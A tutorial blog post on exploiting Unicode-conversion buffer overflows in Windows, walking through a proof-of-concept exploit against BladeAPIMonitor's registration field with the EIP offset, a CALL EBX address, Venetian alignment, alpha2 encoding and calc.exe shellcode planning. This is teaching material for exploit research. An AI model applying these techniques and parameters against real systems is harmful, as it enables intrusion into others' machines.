Windows Exploit Development – Part 7: Unicode Buffer Overflows

Written on: September 3, 2014


In this seventh installment of the Windows Exploit Development Series, I’ll introduce Unicode Buffer Overflows. We’ll start with a brief introduction to Unicode (what it is and why/how it’s used in Windows) and then jump right in to some example exploits. If you plan on following along, I recommend you have the following:

    • A Windows environment (XP or Win 7 — my demos will be on the latter)
    • Metasploit, Alpha2 or Alpha 3 encoder
    • An assembler/disassembler (e.g. nasm/ndisasm)
    • Dumpbin Utility
    • Immunity Debugger with the Mona plugin
    • A scripting language (I’ll use Perl for these demos).

While I’m going to cover several topics and provide multiple examples, it’s always beneficial to have other reference material when learning a new topic; here are some that I recommend:

I also recommend you check out some of my prior tutorials to ensure you have a solid understanding of exploit basics (registers, the stack, memory layout, etc), how buffer overflow attacks work, SEH-based exploits and jumping techniques.

What is ANSI?

Years ago, Windows introduced “code pages” to accomplish string encoding by mapping ASCII and international language character sets to specific code values (e.g., A=41, B=42, etc) and storing them in individual pages. Many character sets, including ASCII, are considered single-byte character sets because each character/letter can be represented by a single byte. Other, more complex languages such as Japanese and Chinese require double-byte encoding, where some letters must be represented by two bytes. Each Windows installation is assigned a default code page corresponding to the default language configured on the system. Depending on your default language, you may be using a different code page than I do. The most common code page (and the one I am using) is Code Page 1252 (Windows Latin I).

This and other code pages were supposedly originally developed based on draft ANSI encoding standards and so they came to be known as “ANSI Code Pages”. Although these standards were never officially released by ANSI and the name “ANSI Code Page” was considered a misnomer, text that is encoded using code pages is still referred to as “ANSI” in current Microsoft parlance. In fact, you will see multiple Windows string functions appended with an “A” or “W”, which correspond to ANSI functions and Wide (or Unicode) functions. ANSI functions manipulate strings encoded by a code page, whereas Wide functions work with Unicode strings.

In the Windows environment, when you think of a typical, null-terminated, single-byte ASCII string, you should think ANSI. These strings are also referred to as “multibyte” strings. I will typically refer to non-Unicode strings as either ANSI or multibyte strings in this post.

The problem with code pages is that they are not a very elegant or uniform way of managing character encoding, so a better standard was developed: Unicode.

What is Unicode?

The Unicode standard, originally founded by Apple and Xerox in 1988 and further developed by a larger consortium starting in the early 90s, was developed to better accommodate languages with large character sets (Japanese, Cyrillic, Arabic, etc) that could not be represented by the limited symbols available in the traditional single-byte character set.1

There are several Unicode Transformation Format (UTF) standards, such as UTF-8 and UTF-32, but when we’re talking about Windows, the standard in use is UTF-16. With UTF-16 each character is encoded as 2 bytes (16 bits). Because it consistently uses two bytes, it can represent all of the various international characters in a more standardized and ultimately, more efficient manner than trying to manage individual single- and multi-byte code pages. Note: there are also surrogate and supplementary characters that use more than 16 bits, but we won’t cover that in this post. Feel free to read up on them here.

The UTF-16 standard is organized by character set. For example, values 0000-007F represent the standard ASCII character set, 0080-00FF represent Latin1 characters, 0100-017F represent European Latin, etc. (through 097F).

The reason Unicode encoding is such an important topic as it relates to Windows exploit building is because Windows (since NT) represents all of its internal kernel/OS/API strings in Unicode. Further, many modern applications are moving away from the standard ANSI character sets and towards the Microsoft-recommended Unicode encoding. You’re also likely to run into Unicode if you frequently test internationally-developed applications.

When strings are declared in a Windows application they are represented either in multibyte/ANSI (A) or in Unicode (W, aka Wide), and the Windows API contains functions that have both an “A” and a “W” version. The “A” versions utilize the system’s currently active code page whereas the “W” versions use the Unicode standard.

I sometimes see confusion surrounding the terms ANSI, ASCII, and Unicode. Many texts and debuggers label a string as either “ASCII” or “Unicode”. Not to mention, “ANSI encoding” is technically a misnomer introduced and perpetuated by Microsoft and the Unicode standard includes more than just UTF-16. Regardless of what is technically correct, this series is focused on Windows-exploits so we must use the Microsoft frame of reference. Therefore, it may help to remember the following points:

  • First and foremost, in Microsoft-speak, you’re typically either working with an ANSI (multi-byte) string or with a Unicode (UTF-16/wide) string.
  • Both ANSI and Unicode can represent the ASCII character set just as they can both represent international languages — they just do it in a different manner. ANSI uses code pages made up of a mix of single- and multi-byte characters whereas Unicode uses a standardized 2-byte encoding. In other words, ASCII can be ANSI-encoded or it can be Unicode-encoded. That being said…
  • If you hear or read a reference to an “ASCII” string (vs. a Unicode string), it is likely referencing a typical “ANSI” encoded string represented by single-byte ASCII characters.

1 Reference: Windows via C/C++ (5th Edition) (Developer Reference) Nasarre, Christophe; Richter, Jeffrey

A closer look at Unicode vs. ANSI strings

Quite often, the strings we enter as input to an application are internally represented as (or converted to) Unicode (aka “Wide”) strings. While this may be transparent to the standard application user, it means our input is converted from its single-byte, code-page representation to a two-byte Unicode value.

Let’s use the following code example to see how ANSI (multibyte) and Unicode (wide) strings are represented in memory.

You can compile it and run it with your debugger, pausing it on the first executable instruction.


The various function calls should be evident. Pay particular attention to pStrA, a pointer to a typical, null-terminated multibyte/ANSI string as it’s stored in memory (see above screenshot). Note all of the ASCII A’s are stored as consecutive single bytes (0x41).

The next several function calls serve to convert that ANSI string to a Wide (Unicode) string. The first function call to GetACP retrieves the number of the current code page.

Next is a call to MultiByteToWideChar, which is the Windows function that converts an ANSI string to a Unicode string.


However, this first call doesn’t actually convert anything. Instead, because we pass null for WideCharBuf and 0 for WideBufSize, it returns the required length of the resulting wide string, which is then used to size the HeapAlloc call so we can reserve the necessary memory. As you can see below, the HeapSize is 38, or twice the length of our ANSI string. This accounts for the two-byte Unicode encoding.


Now that we have the necessary memory reserved, the second call to MultiByteToWideChar will actually make the Unicode conversion. You can see below that we now pass the location of our memory allocation and our buffer size.


Here’s the result:


On the right side of the above screenshot, you can see the resulting Wide string on top of the stack, prefaced by “UNICODE“. On the left you can see this same string as it’s stored in memory in its two-byte encoding. Because this string is comprised of ASCII characters that fall within the 0x00-0x7F byte range, they don’t need to use both bytes of the Unicode representation, so each character byte is followed by a null byte (0x00). This automatic padding of nulls certainly can’t be good for exploit code…
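To see the same null padding without a debugger, here is a minimal Python sketch of the conversion. It is only an approximation of what MultiByteToWideChar does: the helper name ansi_to_wide is made up for this illustration, and it assumes the active code page is 1252.

```python
def ansi_to_wide(data, code_page="cp1252"):
    """Approximate an ANSI -> UTF-16LE conversion (assumes code page 1252)."""
    return data.decode(code_page).encode("utf-16-le")

ansi = b"A" * 8                      # eight single-byte 0x41 characters
wide = ansi_to_wide(ansi)

# Every ASCII byte is now followed by a 0x00 byte.
print(" ".join(f"{b:02x}" for b in ansi))
print(" ".join(f"{b:02x}" for b in wide))
print(len(ansi), "->", len(wide), "bytes")
```

The wide buffer is exactly twice the size of the ANSI one, which is why the allocation in the walkthrough above doubles.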

How does Unicode affect our exploits?

In the traditional buffer overflows we’ve examined so far, the exploit buffer and shellcode you provide as input to the vulnerable application are parsed as an ANSI string (at least to the point of the overflow) and your original exploit code is preserved. Now imagine what would happen if your shellcode were converted to a Unicode string and padded with alternating null bytes. It wouldn’t execute the instructions as originally intended. As a simple example, let’s say you had the following shellcode:  \x41\x42\x43

This translates to the following Assembly instructions:

If that shellcode were to be translated to Unicode at the time of the overflow, it would look as follows: \x41\x00\x42\x00\x43\x00.

This translates to the following Assembly:

Not exactly the same instructions we had intended, which will probably lead to an unsuccessful exploit.
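The change in meaning can be reproduced with a toy decoder. The Python sketch below is not a real disassembler: it only understands the handful of x86 opcodes that show up in this post (one-byte inc/dec/push/pop and the 0x00 "add r/m8, r8" form), the function names are hypothetical, and the widening step assumes code page 1252.

```python
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]
ONE_BYTE = {0x40: "inc", 0x48: "dec", 0x50: "push", 0x58: "pop"}

def widen(data):
    """Approximate the ANSI -> UTF-16LE conversion (assumes cp1252)."""
    return data.decode("cp1252").encode("utf-16-le")

def decode(code):
    """Decode a tiny subset of 32-bit x86; stop at anything else."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if (op & 0xF8) in ONE_BYTE:                 # 0x40-0x5f: register in low 3 bits
            out.append(f"{ONE_BYTE[op & 0xF8]} {REG32[op & 7]}")
            i += 1
        elif op == 0x00 and i + 1 < len(code):      # add r/m8, r8
            modrm = code[i + 1]
            mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
            if mod == 3:                            # register to register
                out.append(f"add {REG8[rm]}, {REG8[reg]}")
                i += 2
            elif mod == 1 and rm != 4 and i + 2 < len(code):   # [reg + disp8]
                out.append(f"add [{REG32[rm]}+0x{code[i + 2]:02x}], {REG8[reg]}")
                i += 3
            else:
                out.append("(not handled)")
                break
        else:
            out.append("(incomplete or not handled)")
            break
    return out

shellcode = b"\x41\x42\x43"
print(decode(shellcode))          # the instructions as written
print(decode(widen(shellcode)))   # the instructions after null padding
```

In the widened stream the byte 0x42 is no longer an instruction of its own; it is consumed as the operand byte of an add that starts with the injected null. The trailing null is left waiting for whatever byte follows it in memory.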

As a more thorough illustration, I’ve provided the following simple C program that will take one of three command line arguments:

  • ‘A’ to execute standard ANSI-based shellcode like a traditional buffer overflow exploit,
  • ‘W’ to execute encoded shellcode to represent a successful Wide/Unicode-based exploit
  • ‘F’ (for Fail) to show what happens when you try to execute ANSI shellcode in a Unicode exploit.

Here’s a look at passing arg -A (successful standard overflow, left) and arg -F (unsuccessful ANSI exploit buffer in a Unicode exploit, right).


The window above right illustrates how trying to pass ANSI shellcode to a Unicode exploit will mangle the instructions and as you might imagine, the exploit will fail. Again, this is because the Unicode conversion injected null bytes that completely changed the original instructions (as they appear in left window). The corresponding results for both are below (with the unsuccessful attempt to pass ANSI shellcode to a Unicode exploit on the right).


So how about when you pass the ‘W’ parameter to the above program? Well in that case, the shellcode that’s passed to the Unicode “exploit” (shellW) has been specially encoded to account for the automatic insertion of null bytes. It can decode itself, remove the null bytes, and execute as originally intended. To do that, I used Metasploit’s alphanumeric uppercase unicode encoder to encode the shellcode payload specifically for a unicode exploit. In the next real world example exploit we’re going to build, I’ll show you another tool called alpha2 that does the same thing. The thing to keep in mind for both tools is that they produce an encoded version of the original shellcode. In order for it to decode in memory, they must prepend a decoding routine to the shellcode. This means your shellcode is going to be considerably larger to make room for the extra bytes added by the encoding as well as the addition of the decoding routine. Another thing to note is that these decoding routines need a designated register (i.e. “baseaddress” or “bufferregister”) to use as a reference point when decoding. You define this register at the time of encoding and you write additional instructions in your exploit buffer to adjust the address of that register to point to the beginning of your shellcode.

If this doesn’t make sense yet, don’t worry…we’ll build a couple of real-world exploits in the next two examples that should make it much clearer.

Example 1: Basic Unicode BOF

When I started looking for vulnerable programs to use as examples for this tutorial, I realized that only one of the Unicode-based exploits I’ve published to Exploit-DB has the application available for download and it was an SEH-based exploit. I wanted to start with a non-SEH unicode BOF and I came across this one:

Depending on your experience, this posted exploit code may look complex but have no fear…we’re going to develop a bit simpler POC version that accomplishes the same thing and illustrates the basics of Unicode exploits.

First, download the vulnerable application from the above Exploit-DB link and install it. We’re going to build our exploit to work on either Windows 7 SP 1 (which is what I’m using for this example) or Windows XP SP 3 so feel free to use either. You can use other versions of XP, but you will have to make some adjustments to the shellcode (I’ll tell you where).

Once installed, launch the application and attach Immunity Debugger. The vulnerable function is the registration code entry (“Entery SN”):

We’ll build our test exploit buffer by simply printing a string of 5000 characters to a text file and copying/pasting it in the registration field (buffer = “\xcc” x 5000). I prefer to use something like an interrupt (\xcc) vs. all A’s (\x41) because in a Unicode exploit, the A’s could get translated to 00410041 which, depending on the executable/dll’s base address, may be a valid address. [INT instructions can also be translated to a valid address as you’ll see later so you may have to review the addresses of all loaded modules and choose an alternate character]. Should this happen, the application would still crash but the registers and stack may not reflect the true initial crash state.

Here’s what our Registers (including EIP) and memory dump look like with our string of 5000 \xcc (note: your addresses may vary from mine):


As you can see we have over 500 bytes of usable shellcode, but it seems to be broken up by some mangled/bad characters. We’re not quite sure yet exactly where our EIP overwrite falls within the buffer but we do see that EBX points close to the middle of the exploit code — this will help us later.

Because we’re building this first exploit as a standard BOF, let’s ignore any SEH overwrite. Our next step is to determine our offset to EIP. You can use the metasploit pattern generator provided in the Immunity Mona plugin. Generate a 5000 character pattern, copy it from the pattern.txt file, paste it in the vulnerable SN registration field, and trigger the overflow.


Remember my earlier point that the Unicode nulls in the EIP overwrite can cause it to inadvertently translate to a valid address…you can see that happens here with our EIP value of 0x00410036. Although this is where we’ve stopped (due to an exception), it’s not exactly the point at which the overflow was triggered. In fact, several instructions have executed and if we try and calculate our offset from this value in EIP, it will be wrong.

In this case, you can find the offset by trial and error or you can start at a higher offset in the metasploit pattern that won’t translate to a valid address when it overwrites EIP. I chose the latter, starting at character 2000 (just copy and paste the pattern starting at character 2000 through character 5000). This time our EIP overwrite does not translate to a valid address and we get an overwrite of 00330079.


The pattern offset function tells us our offset is at 2288, and since we started at character 2000 in our metasploit pattern, this translates to 288.


We also need to account for the fact that character 2000 of the pattern became position 0 of our input, and for the Unicode null byte between 33 and 79, so we really have an offset of 290. This matches the offset in the original exploit posted to Exploit-DB, but let’s verify anyway. We’ll start building our exploit buffer with our offset of 290, a test EIP overwrite of \xcc, and some filler to even out our buffer.
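As a cross-check on that arithmetic, the Python sketch below regenerates a Metasploit-style cyclic pattern, recovers the two pattern characters from the EIP value 0x00330079, and locates them. It assumes the paste began at zero-based index 2000 of the pattern; the variable names and the “B” filler are illustrative choices, not the author’s script.

```python
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...), truncated to `length` characters."""
    triples = (u + l + d for u, l, d in product(ascii_uppercase, ascii_lowercase, digits))
    return "".join(triples)[:length]

pattern = cyclic_pattern(5000)

# EIP held two pattern characters with a null after each one.
eip = 0x00330079
chars = eip.to_bytes(4, "little").decode("utf-16-le")

start = 2000                           # assumed zero-based index where the paste began
position = pattern.find(chars, start)  # first hit inside the pasted portion
offset = position - start
print(chars, position, offset)

# Test buffer: filler up to the offset, a two-character EIP marker, then padding.
junk = "A" * offset
eip_test = "\xcc" * 2
filler = "B" * (5000 - len(junk) - len(eip_test))
buffer = junk + eip_test + filler
```

Searching from index 2000 matters because the same two-character pair repeats earlier in the pattern; only the first hit inside the pasted portion corresponds to the overwrite.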

Copying and pasting the resulting buffer and triggering the exploit gives us the following:


We’ve confirmed our EIP offset and can see its position is fairly centered in our exploit buffer. We know we have 290 bytes preceding EIP, but these don’t all appear to be usable as there are some random characters injected at the very end (leaving us with about 280 usable bytes).


We only have about 260 usable bytes after EIP which is where our initial exploit code will have to reside (to adjust our registers and jump to our shellcode) and no other copies of our buffer reside elsewhere in memory, which means we’ll either have to split our shellcode between the two spaces or keep it under ~280 bytes. Because splitting the shellcode would add additional instructions (for the extra jump) and both portions would have to be unicode formatted or encoded (which also consumes available bytes), I’m going to choose to keep our shellcode under 280 bytes and place it all in our buffer before the EIP overwrite. This means our buffer will look something like this:


We’ll get to the shellcode and register adjustments shortly, but just like any traditional buffer overflow, we first need to figure out a way to use our EIP overwrite to direct execution flow to a predictable location in our buffer. We’ve already established that EBX points to a location somewhere in our buffer so a jump or call EBX instruction should do the trick. Of course, this can’t be just any jump or call instruction … it has to be a Unicode friendly address! In other words, it must contain two null bytes (or another unicode friendly two-byte combination).

We’ll use the Immunity mona plugin to find all CALL/JMP EBX instructions (!mona jmp -r ebx). Check the resulting output file for any that are unicode-friendly. We’re in luck, because we have three different options.

As a side note, addresses with two null bytes are technically not the only Unicode-friendly addresses. Certain characters in the extended ASCII set (0x80 and above) translate to two-byte Unicode that does not include a null. For example, under Code Page 1252, \x85 translates to U+2026, which is stored in memory as \x26\x20. That means 0x00432026 could also be a valid Unicode address (0x00432026 = \x26\x20\x43\x00 in memory, which results from the following EIP overwrite: \x85\x43). This Blackhat presentation is a frequently-referenced source for those non-null Unicode transformations. Also note that mona returned more results than what I showed above (the rest were filtered out by my find command).

Back to our exploit, we’ll use the first address returned by mona (0x0043003e), which is the same address used in the exploit posted to Exploit-DB. Let’s test this CALL EBX instruction by updating our Perl exploit script (note I’ve switched the “B”s to “\xcc” to trigger an INT instruction so we can see where we land). Be sure to omit the null bytes from your address since the Unicode conversion will take care of that for us.
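Here is a small Python sketch of that idea: it checks that an address has the null-padded 0x00XX00YY form and derives the two bytes to place in the buffer. The helper names are hypothetical and the widening step assumes code page 1252, so bytes in the 0x80-0x9f range (which do not widen to a simple XX 00 pair) are rejected.

```python
def widen(data):
    """Approximate the ANSI -> UTF-16LE conversion (assumes cp1252)."""
    return data.decode("cp1252").encode("utf-16-le")

def is_null_padded(addr):
    """True for 32-bit addresses of the form 0x00XX00YY."""
    return (addr & 0xFF00FF00) == 0

def overwrite_bytes(addr):
    """Return the two bytes to place in the buffer for a 0x00XX00YY address."""
    if not is_null_padded(addr):
        raise ValueError("address is not of the form 0x00XX00YY")
    solid = addr.to_bytes(4, "little")[0::2]      # YY, XX (nulls dropped)
    if any(0x80 <= b <= 0x9F for b in solid):
        raise ValueError("byte would not widen to XX 00 under cp1252")
    return solid

eip = overwrite_bytes(0x0043003E)
print(eip.hex())                                   # bytes to put in the buffer
restored = int.from_bytes(widen(eip), "little")
print(hex(restored))                               # what EIP receives after widening
```

Note the byte order: because the address is stored little-endian, the low byte (0x3e) comes first in the buffer.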

Generate and enter the new buffer as the BladeAPIMonitor Registration code…


Perfect, we’ve confirmed our CALL EBX instruction works and gets us to a predictable location in our shellcode. From the above image, you can see that there are some \xcc instructions that immediately precede the address pointed to by EBX. Counting backwards, you’ll find that there are exactly 20. That means after we take the CALL EBX instruction we land in our buffer 20 bytes past our EIP overwrite. Let’s update our exploit code by adding a $junk2 parameter to account for this.

Of course, our ultimate goal is to execute our shellcode, but in order to do that we have to write some additional instructions that will:

  1. Put the address from EBX in EAX
  2. Adjust the address in EAX to point to our shellcode (which is 290 bytes before our EIP overwrite)
  3. “Jump” to EAX to redirect execution to our shellcode.

Moving EBX into EAX

Remember earlier when I said that the alphanumeric encoders we’re going to be using to make our shellcode “unicode-compatible” require a designated register for the decoding routine? We’re going to use EAX as our designated register which means we must get EAX to point to our shellcode. Since we know EBX points to our buffer, the first step is to move the address in EBX into EAX. We would normally just need to execute a push EBX (\x53) and a pop EAX (\x58) instruction. But take a look what happens if we try this here:


The push EBX instruction executes just fine but because the application converts our buffer to Unicode, the added nulls change our instructions and we don’t get the results we expected. All we have to do to overcome this problem is insert some additional instructions, that when combined with the added Unicode nulls, perform a benign action and align our other instructions so they execute as expected. So, instead of “\x53\x58“, we can do the following:

As you can see, we’ve inserted two additional one-byte instructions that, when combined with the nulls that the Unicode conversion automatically adds, will execute something benign — in this case adding al to [edx]. This use of these alternating padding instructions has come to be known as “Venetian shellcode”.

The Unicode buffer can be imagined to be somewhat similar to a Venetian
blind; there are “solid” bytes that we control, and “gaps” containing the
alternating zeroes.

– Chris Anley Creating Arbitrary Shellcode In Unicode Expanded Strings (Jan 8, 2002);
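The blind analogy can be made concrete with a few lines of Python. This is a sketch only: the venetian helper is a made-up name, \x42 is the pad byte discussed above, and the widening step assumes code page 1252.

```python
def widen(data):
    """Approximate the ANSI -> UTF-16LE conversion (assumes cp1252)."""
    return data.decode("cp1252").encode("utf-16-le")

def venetian(instructions, pad=b"\x42"):
    """Follow each one-byte instruction with a one-byte pad."""
    return b"".join(op + pad for op in instructions)

def split_groups(expanded):
    """Split widened bytes into alternating 1-byte and 3-byte groups."""
    groups, i = [], 0
    while i < len(expanded):
        groups.append(expanded[i:i + 1])        # the real one-byte instruction
        groups.append(expanded[i + 1:i + 4])    # null + pad + null
        i += 4
    return groups

align = venetian([b"\x53", b"\x58"])            # push ebx, pop eax
expanded = widen(align)
for group in split_groups(expanded):
    print(group.hex(" "))
```

Each three-byte group (00 42 00) is the harmless add on [edx], and each one-byte group is an instruction we actually want, now sitting on its own boundary.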

One thing to keep in mind here is that although these benign venetian shellcode instructions won’t be doing anything other than aligning/padding our exploit instructions, they must still execute successfully. In our example, if [edx] pointed to an invalid location, any attempt to add a value to it would result in an exception and our exploit would fail. As a result, \x42 may not always work for every exploit and you’d have to find an instruction that targets a different register. No worries though, because there are plenty of other instructions to choose from as you can see below:


Let’s add our venetian padding to our exploit code and see how it works. Here’s our updated exploit:

And the result…


That worked. The addition of the venetian shellcode aligned our PUSH and POP instructions and now EAX holds the same address as EBX.

Getting EAX to point to our shellcode

The next step is to adjust EAX so it points to the beginning of our shellcode. We know we’re going to put our shellcode at the beginning of our buffer so we just need to calculate how far our current location is from the beginning of our buffer and subtract that value from EAX.

290 + 2 + 20 = 312    ($junk1 + $eip + $junk2)

EAX holds the value copied from EBX, which points just past $junk2, so the alignment instructions themselves don’t count toward the distance. We have to account for the null byte that is added to each inserted character, which means we have to double our value to 624. So we need to subtract a total of 624d (0x270) bytes from EAX. You can verify this by checking the addresses in the dump window:


Here’s the trick that will allow us to perform this subtraction in a Unicode friendly manner:

First we’ll subtract 0x11001800 and then we’ll add 0x11001600. This gives a net subtraction of 200h or 512 decimal.

Those two instructions will look like this (note the absence of the \x00 bytes which will be added by the Unicode conversion):
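The author’s exact listing isn’t reproduced here, but the encoding follows directly from the opcodes, so a Python sketch can show one byte sequence consistent with the description. The helper names are hypothetical, the \x42 pad between instructions is an assumption carried over from the alignment step, and the widening step assumes code page 1252.

```python
import struct

def widen(data):
    """Approximate the ANSI -> UTF-16LE conversion (assumes cp1252)."""
    return data.decode("cp1252").encode("utf-16-le")

def solid_imm(opcode, imm32):
    """Bytes to supply for `opcode imm32` when imm32 has the form 0xYY00XX00."""
    raw = struct.pack("<BI", opcode, imm32)     # opcode, then little-endian imm32
    if raw[1] != 0 or raw[3] != 0:
        raise ValueError("immediate does not line up with the injected nulls")
    return raw[0::2]                            # keep opcode, XX, YY

PAD = b"\x42"                                   # assumed pad: add [edx+0], al
SUB_EAX, ADD_EAX = 0x2D, 0x05                   # sub eax, imm32 / add eax, imm32

adjust = solid_imm(SUB_EAX, 0x11001800) + PAD + solid_imm(ADD_EAX, 0x11001600) + PAD
expanded = widen(adjust)

print(adjust.hex(" "))      # what goes in the buffer
print(expanded.hex(" "))    # what lands in memory

net = (0x11001600 - 0x11001800) & 0xFFFFFFFF    # net change applied to EAX
print(hex(net))             # 0xfffffe00, i.e. -0x200
```

The pad after each instruction soaks up the leftover null so the next opcode starts on a clean boundary.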

As you can see this approach only works for whole numbers in increments of 100 hex. That means we’ll have to figure out another way to subtract the remaining 112d bytes. We have a couple of options. The simplest is merely to decrement EAX 112 times (dec eax = \x48). The drawback here is that with the addition of a Venetian shellcode alignment instruction for each dec instruction, this will eat up 224 bytes of our available buffer (“\x48\x42” x 112). For this demo that’s not a problem but in a real-world exploit, every byte may be a precious commodity.

We can get a bit more creative here. Let’s assume that our current EAX after subtracting 200h is 0x0089EBEC and our shellcode starts at  0x0089EB7C.  We’ve already established that we still need to subtract 0x70 or 112d to get EAX to point to that address, but what if we instead added 0x90 to al? That would be EC + 90 = 7C. Since this addition doesn’t affect the remaining bytes of EAX, that would give us our desired address of 0x0089eb7c. But how do we add 0x90 to AL? Look at our registers:


We can see that both ECX and EBP contain characters currently part of the $junk1 portion of our buffer. We know that we’re going to use a portion of these 290 bytes for our shellcode, and we can’t sacrifice much, but if we luck out and these registers contain bytes from the tail end of this 290 byte portion of our buffer, we might be able to use them. We can probably spare no more than 10 bytes of our shellcode space so let’s try splitting our $junk1 buffer into 280 “A”s and 10 NOPs (\x90).


Awesome. Now that we control the value in ECX, specifically the lower bytes (CL) , we can use the following instruction to get EAX where we want it to be: “\x00\xc8”; # add al,cl

That will add our current value in al (EC) and cl (0x90) and get us our desired value of 7C. To add this to our exploit we need to do a bit of adjusting as follows:

Notice the bogus instruction I added before add al,cl. This instruction actually translates to the following opcode after Unicode translation: BF 00110011. The Unicode translation will add an additional \x00 to the end which will actually be tacked on to the beginning of our next instruction, giving us \x00\xc8 which translates to add al, cl.
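A short Python sketch can confirm both the byte alignment and the AL arithmetic. The fragment below is reconstructed from the description (BF 00110011 followed by 00 C8), not copied from the author’s script, and the register values are the example addresses used earlier; the widening step assumes code page 1252.

```python
def widen(data):
    """Approximate the ANSI -> UTF-16LE conversion (assumes cp1252)."""
    return data.decode("cp1252").encode("utf-16-le")

fragment = b"\xbf\x11\x11" + b"\xc8"    # bogus mov edi, then the byte that becomes add al,cl
expanded = widen(fragment)

mov_edi = expanded[0:5]                 # bf 00 11 00 11 -> mov edi, 0x11001100
add_al_cl = expanded[5:7]               # 00 c8          -> add al, cl
leftover = expanded[7:]                 # 00, start of whatever comes next

print(mov_edi.hex(" "), "|", add_al_cl.hex(" "), "|", leftover.hex(" "))

# The 8-bit add wraps around and leaves the upper three bytes of EAX alone.
eax, cl = 0x0089EBEC, 0x90
new_al = ((eax & 0xFF) + cl) & 0xFF
new_eax = (eax & 0xFFFFFF00) | new_al
print(hex(new_eax))
```

The wraparound is what makes this work: adding 0x90 to AL has the same effect on the low byte as subtracting 0x70.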

By using this approach, we saved quite a bit of space in our buffer (216 bytes) that would have been devoted to decrementing EAX. You may have also noticed I changed the As at the beginning of the buffer to INT instructions (\xcc), which will be used to test our “jump” to EAX shortly.

“Jumping” to EAX

Now that we have EAX where we want it, we need to add some instructions that redirect execution to EAX. Unfortunately, we can’t use JMP EAX (\xff\xe0) or CALL EAX (\xff\xd0) because each is a two-byte instruction that will be clobbered by the null bytes of the Unicode translation.

As an alternative, we can push EAX to the stack and issue a RET instruction. I’ve updated the exploit code to include this:

Testing it out, we get the following successful result:


Now that we’ve successfully redirected program execution to the beginning of our buffer, all that’s left is to write our shellcode …

The Shellcode

It should be no surprise by now that we’re going to have to account for the null byte that will be injected after each byte of our shellcode. There are a couple of ways to address this, one of which is to encode it. For this demo, we’re going to use the alpha2 encoder.

The output will be a unicode-friendly, alphanumeric version of our shellcode like this:


Alpha2 prepends a decoding routine to the shellcode to convert it back to its original form. Both the unicode-friendly encoding as well as the prepended decoder will take up space that we would normally have available for shellcode instructions in a non-unicode exploit so we’ll have to account for this in our relatively small buffer space. One important thing to note about Alpha2 is that it decodes the shellcode in place in memory, which means it must be written to a location with R/W/E privileges.

Note that there are other encoding tools besides alpha2. I’ll use Metasploit in the next real-world exploit example, but if you want an example of at least one more, you can check out the Corelan Unicode exploit post here.

Since we have to allocate room for the encoding overhead and the prepended decoding routine added by alpha2, we’re going to need to keep our pre-encoded shellcode under 80 bytes — that’s not a lot. In fact, an alpha-encoded out-of-the-box Metasploit calc.exe shellcode is over twice that in length. While I planned on waiting to cover shellcode writing for a later post, given the constraints of this exploit, it’s probably best that we just write our own.

Let’s start by outlining the objectives of our shellcode. Here are the four I’ve defined for this example:

  1. Keep it under 80 bytes in length
  2. Launch calc.exe
  3. Ensure a clean exit from the vulnerable application
  4. Work on Windows XP SP3 and Windows 7 SP1

Let’s cover each of these in a bit more detail:

Objective 1: Keep it under 80 bytes

To work within our space constraints and encoding requirements we need to keep this shellcode under 80 bytes. This will limit some of our functionality and portability so we need to keep it in mind as we consider the remaining objectives.

Objective 2: Launch calc.exe

Keeping in line with previous examples, let’s make the purpose of this shellcode simple — to launch calc.exe.  We can do this by calling the WinExec() function found in Kernel32.dll. Here is the function prototype from MSDN:

It’s pretty simple, requiring only two parameters — the command we plan to call (in our case “calc”) and the display options of the resulting window (we’ll use 0). Although we know which DLL contains this function, we won’t necessarily know the address at which it’s loaded for a given machine, an issue we’ll tackle when we cover objective 4.

Objective 3: Ensure a clean exit from the vulnerable application

Our next objective will be a clean exit from the crashed application. For illustrative purposes, try the original exploit posted to Exploit-DB on a Windows 7 machine (the buffer string can be copied from the bottom of the exploit code).


In most cases, although calc.exe successfully launches, the BladeAPIMonitor application crashes and generates an exception prompt instead of exiting cleanly.


For this demo it doesn’t really matter, but if a real-world exploit requires persistence beyond the life of the parent process, an unclean exit could be problematic. Preventing such a crash will take up some of our limited shellcode space, but we should be able to make it work. To do so, we’ll use the ExitProcess() function, also found in Kernel32.dll.

Once again, the function parameters are really simple, requiring us only to pass an exit code (for which we’ll use 0).

Objective 4: Work on Windows XP SP3 and Windows 7 SP1

While the goal of most shellcode should be to make it as universal as possible, we’re pretty limited by our space requirements. I didn’t want to go to the other extreme and only have this work on a single platform, so I chose the middle ground and made our objective to execute successfully on both Windows XP SP3 and Windows 7 SP 1. Getting this to work on non-ASLR Windows XP is a bit easier because we could technically hard-code the addresses of our functions and have this work fairly reliably. This approach wouldn’t work on Windows 7 as ASLR changes the base load address of the DLLs each time. Ideally we wouldn’t hard-code any addresses and instead use a Windows function such as GetProcAddress() to dynamically determine the addresses of our functions at run time, but given our space constraints and the fact that this is a tutorial on Unicode exploits (and not shellcode writing) I chose the middle ground: we’ll determine the base address of the DLL(s) we plan to use, but hard-code the offsets to the functions. This will work because although ASLR will change the base address for each module, the offsets to the functions within the DLL will remain static across run times. That being said, Microsoft can and does change the DLLs, and in doing so, changes the offsets. The fact that we’re only going to use Kernel32.dll for this example means that these offsets should apply to the latest releases of Windows XP SP3 and Windows 7 SP 1, but if Microsoft releases a major update/SP for Windows 7, it may no longer function. Again, not universal, but certainly better than hardcoding the DLL base address.

Now that we’ve defined our objectives, let’s get to work…

For this example we’re going to write our shellcode in Assembly. When it comes to writing the Assembly you have several options. You can write it directly in a C program using the __asm keyword and compile with Visual Studio.

You can then disassemble the resulting compiled binary to get your opcodes or you can load it into a debugger like Immunity and copy the opcodes directly from there.


To incorporate them into an exploit script, you can then convert them to hex: \x33\xdb\xbb\x01\x00\x00\x00…
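The conversion itself is mechanical. Here is a minimal sketch in Python (not the Perl used elsewhere in this post); the helper name `to_hex_escapes` is made up for illustration, and the sample is just the seven bytes quoted above.

```python
def to_hex_escapes(opcodes: bytes) -> str:
    """Render raw opcode bytes as a \\xNN escape string for pasting into a script."""
    return "".join(f"\\x{b:02x}" for b in opcodes)


# The seven bytes quoted above: 33 DB (xor ebx,ebx) followed by BB 01 00 00 00 (mov ebx,1)
sample = bytes([0x33, 0xDB, 0xBB, 0x01, 0x00, 0x00, 0x00])

print(to_hex_escapes(sample))
```

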